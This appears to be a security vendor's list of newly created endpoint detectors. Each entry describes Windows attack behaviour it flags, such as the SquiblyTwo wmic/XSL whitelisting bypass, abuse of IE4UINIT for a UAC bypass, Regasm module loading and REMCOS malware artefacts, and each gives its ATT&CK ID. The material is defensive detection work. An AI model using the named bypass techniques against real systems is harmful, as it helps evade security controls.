==================================================

CREATED: WIN-REGASM-CLR-MODLOAD (#2137)

Description

This detector identifies Regasm loading the C-Language Runtime DLL (clr.dll) and wminet_utils. Adversaries may utilize this technique execute payloads which can bypass application whitelisting.

ATT&CK Technique T1121

==================================================

CREATED: WIN-WMIC-XSL (#2182)

Description

This detector identifies instances of the Windows Management Instrumentation Command-line Utility (wmic.exe) when given an xsl file to execute with the format option. This technique is known as the SquiblyTwo application whitelisting control bypass technique.

ATT&CK Technique T1220

==================================================

CREATED: WIN-IE4UINIT-MODLOAD-SCROBJ (#2212)

Description

This detector identifies IE4UINIT loading the Scrobj DLL. Adveraries can abuse the default settings for IE4UINIT to bypass UAC to launch malicious code.

ATT&CK Technique T1088

==================================================

CREATED: PRODUCT-NIRSOFT-PRODUKEY (#2224)

Description

This detector identifies executions of programs that are part of the Produkey product, these programs are classified as Riskware in the License Bypass category. A third-party application for bypassing software license restrictions.

==================================================

CREATED: WIN-REMCOS-POSSIBLE-FILEMOD (#2229)

Description

This detector identifies files and directories commonly seen with REMCOS malware infections.

ATT&CK Technique T1056

==================================================

CREATED: WIN-RUNDLL-NO-CLI-CHILDPROC (#2233)

Description

This detector identifies instances of the Windows Rundll32 process executing without command line arguments but spawns a child process.

ATT&CK Technique T1085

Did this answer your question?